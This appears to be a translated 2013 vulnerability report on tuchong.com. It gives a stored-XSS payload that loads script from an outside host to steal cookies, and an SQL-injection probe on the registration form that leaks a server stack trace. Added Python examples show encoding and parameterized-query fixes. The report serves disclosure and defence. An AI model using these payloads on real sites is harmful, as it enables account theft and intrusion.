
Tuchong (tuchong.com) stored XSS: cookies can be stolen

Date: 2013/4/19 12:09:00  Author: 平凡之路  Source: xuhantao.com

Serious impact, right? Once you have the cookies, the account and the MD5 password come with them, and then......
Details:
After registering, configure it here:
Insert this in the tag field:
a><script/src=//tmxk.org>;<!--<a
 
Save.
 
It fires on the personal homepage \(^o^)/~
This...... I tested it myself; stealing the cookies has serious impact - -
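The stored payload above works only because the tag text reaches the profile page's HTML without output encoding. The Python below is an added example, not code from the report or from tuchong.com: it pushes the report's payload through a constructed stand-in template once unencoded and once with context-aware encoding, uses the standard-library HTML tokenizer to show which version produces a <script> element, and adds a check for the HttpOnly and Secure attributes on the session cookie that the injected script would read. The template, the cookie name PHPSESSID and the Set-Cookie header are assumptions made for the example.

```python
import html
from html.parser import HTMLParser

# The stored-XSS payload from the report, exactly as submitted in the tag field.
PAYLOAD = "a><script/src=//tmxk.org>;<!--<a"


def render_tag_unsafe(tag):
    """Constructed stand-in for the profile page: the tag text is dropped
    straight into the HTML, which is the assumption behind the payload."""
    return f'<li class="tag">{tag}</li>'


def render_tag_safe(tag):
    """Same template with output encoding for an HTML text context.
    quote=True also encodes ' and ", so the value stays inert if the same
    helper is reused inside a quoted attribute value."""
    return f'<li class="tag">{html.escape(tag, quote=True)}</li>'


class StartTagCollector(HTMLParser):
    """Records every start tag the HTML tokenizer sees in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def injected_script_sources(fragment):
    """Return the src of every <script> element the fragment creates.
    A non-empty result means attacker-controlled text became markup."""
    parser = StartTagCollector()
    parser.feed(fragment)
    parser.close()
    return [attrs.get("src") for tag, attrs in parser.tags if tag == "script"]


def missing_cookie_flags(set_cookie_header):
    """Report which of HttpOnly/Secure a Set-Cookie header lacks. HttpOnly
    keeps the session cookie out of document.cookie, which is exactly what
    the injected script goes after."""
    attributes = {
        part.strip().split("=", 1)[0].lower()
        for part in set_cookie_header.split(";")[1:]
    }
    return [flag for flag in ("HttpOnly", "Secure") if flag.lower() not in attributes]


if __name__ == "__main__":
    print(render_tag_unsafe(PAYLOAD))
    print("unsafe ->", injected_script_sources(render_tag_unsafe(PAYLOAD)))  # ['//tmxk.org']
    print("safe   ->", injected_script_sources(render_tag_safe(PAYLOAD)))    # []
    # Constructed header; the cookie name is an assumption.
    print(missing_cookie_flags("PHPSESSID=abc123; Path=/"))  # ['HttpOnly', 'Secure']
```

HttpOnly only stops the script from reading document.cookie; it does not stop the same script from driving the site as the logged-in user, so encoding the output for the context it lands in is the actual fix and the cookie attributes are defence in depth.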
There is also a reflected XSS that hits every subdomain:

All tuchong.com subdomains, xxxxx.tuchong.com/?view=list, have the XSS.
 
 
There is a pile of other reflected XSS as well; I hope tuchong fixes them: escape, encode and filter wherever needed...

The Zend configuration is not set up properly either, and there are plenty of path disclosures...

Google: site:tuchong.com php
Or, picking an example at random:
 
Registration:
<input type="text" required="" id="regEmail" name="user_email">
 
I changed user_email to [0x7c or '1'='1'#]
 
 
{
  "result": "ERROR",
  "message": "SQLSTATE[HY093]: Invalid parameter number: no parameters were bound",
  "code": "HY093",
  "trace": [
    {"file": "/srv/http/tuchong/library/Jezo/Db/Adapter.php", "line": 945, "function": "execute", "class": "PDOStatement", "type": "->", "args": [[]]},
    {"file": "/srv/http/tuchong/library/Jezo/Db/TableSelect.php", "line": 155, "function": "query", "class": "Jezo_Db_Adapter", "type": "->", "args": [{}]},
    {"file": "/srv/http/tuchong/application/api/controllers/AccountController.php", "line": 297, "function": "fetchRow", "class": "Jezo_Db_TableSelect", "type": "->", "args": []},
    {"file": "/srv/http/tuchong/library/Zend/Controller/Action.php", "line": 513, "function": "registerAction", "class": "AccountController", "type": "->", "args": []},
    {"file": "/srv/http/tuchong/library/Zend/Controller/Dispatcher/Standard.php", "line": 295, "function": "dispatch", "class": "Zend_Controller_Action", "type": "->", "args": ["registerAction"]},
    {"file": "/srv/http/tuchong/library/Zend/Controller/Front.php", "line": 954, "function": "dispatch", "class": "Zend_Controller_Dispatcher_Standard", "type": "->", "args": [{}, {"headersSentThrowsException": true}]},
    {"file": "/srv/http/tuchong/library/Zend/Application/Bootstrap/Bootstrap.php", "line": 97, "function": "dispatch", "class": "Zend_Controller_Front", "type": "->", "args": []},
    {"file": "/srv/http/tuchong/library/Zend/Application.php", "line": 366, "function": "run", "class": "Zend_Application_Bootstrap_Bootstrap", "type": "->", "args": []},
    {"file": "/srv/http/tuchong/public/api.php", "line": 38, "function": "run", "class": "Zend_Application", "type": "->", "args": []}
  ]
}
 
The rest - -|| I won't go into.....


Fix:

Escape, encode and filter wherever needed... and configure Zend properly.
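The registration response above shows two separate problems: the submitted user_email reaches the database layer in a way that breaks the statement (PDOStatement->execute() is called with an empty argument array, and PDO reports that no parameters were bound), and the exception message, trace and absolute server paths are then serialised straight into the JSON reply. The Python below is an added example, neither the report's nor tuchong.com's code: it uses a constructed in-memory SQLite table to contrast a lookup that splices the value into the SQL text with one that binds it as a parameter, and an error path that returns the trace with one that logs it server-side and returns an opaque error. The first input is the one the report sent; the second input, the table and the handle_register skeleton are assumptions made for the example.

```python
import json
import logging
import sqlite3
import traceback

log = logging.getLogger("register")

REPORTED_INPUT = "0x7c or '1'='1'#"   # what the report submitted as user_email
CONSTRUCTED_BYPASS = "x' OR '1'='1"   # constructed: a quote breakout that matches every row


def make_db():
    """Constructed in-memory users table standing in for the real one."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user_email TEXT)")
    db.executemany("INSERT INTO users (user_email) VALUES (?)",
                   [("alice@example.com",), ("bob@example.com",)])
    return db


def find_user_interpolated(db, email):
    """Vulnerable lookup: the value is spliced into the SQL text, so quotes in
    it change the statement instead of being compared as data."""
    return db.execute(
        f"SELECT id FROM users WHERE user_email = '{email}'").fetchone()


def find_user_bound(db, email):
    """Hardened lookup: the value travels as a bound parameter and can only
    ever be compared, never parsed as SQL."""
    return db.execute(
        "SELECT id FROM users WHERE user_email = ?", (email,)).fetchone()


def leaky_error(exc):
    """What the report's endpoint did: hand the client the exception text and
    a full trace, which includes absolute paths on the server."""
    return {"result": "ERROR", "message": str(exc),
            "trace": traceback.format_exc()}


def hardened_error(exc):
    """Keep the trace in the server log and return an opaque error."""
    log.exception("registration lookup failed")
    return {"result": "ERROR", "message": "registration failed",
            "code": "internal_error"}


def handle_register(db, email, lookup, on_error):
    """Registration handler skeleton (assumed): refuse an address that is
    already registered; route database failures through on_error."""
    try:
        row = lookup(db, email)
    except sqlite3.Error as exc:
        return on_error(exc)
    if row is not None:
        return {"result": "ERROR", "message": "email already registered"}
    return {"result": "SUCCESS"}


if __name__ == "__main__":
    db = make_db()
    # The reported input becomes a malformed statement when interpolated, and
    # the leaky handler ships the resulting trace to the client.
    print(json.dumps(handle_register(db, REPORTED_INPUT, find_user_interpolated, leaky_error), indent=2))
    # Bound, the same input is just an address nobody has registered.
    print(handle_register(db, REPORTED_INPUT, find_user_bound, hardened_error))
    # The constructed breakout matches every row when interpolated...
    print(handle_register(db, CONSTRUCTED_BYPASS, find_user_interpolated, hardened_error))
    # ...and nothing when bound.
    print(handle_register(db, CONSTRUCTED_BYPASS, find_user_bound, hardened_error))
```

The SQLite engine rejects the reported input with a syntax error where MySQL behind PDO reported a binding error; the lesson is the same in both cases, since a query that is built from the value rather than parameterised with it will fail or be bent by the value. For the second problem, with Zend Framework 1 the production setting is to leave the front controller's displayExceptions parameter off and display_errors off in php.ini, so that unhandled exceptions reach the error controller instead of the response; the JSON above was emitted by the API itself, so its exception handling also has to stop serialising the trace.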

Author: _Evil, www.xuhantao.com, 涛涛电脑知识
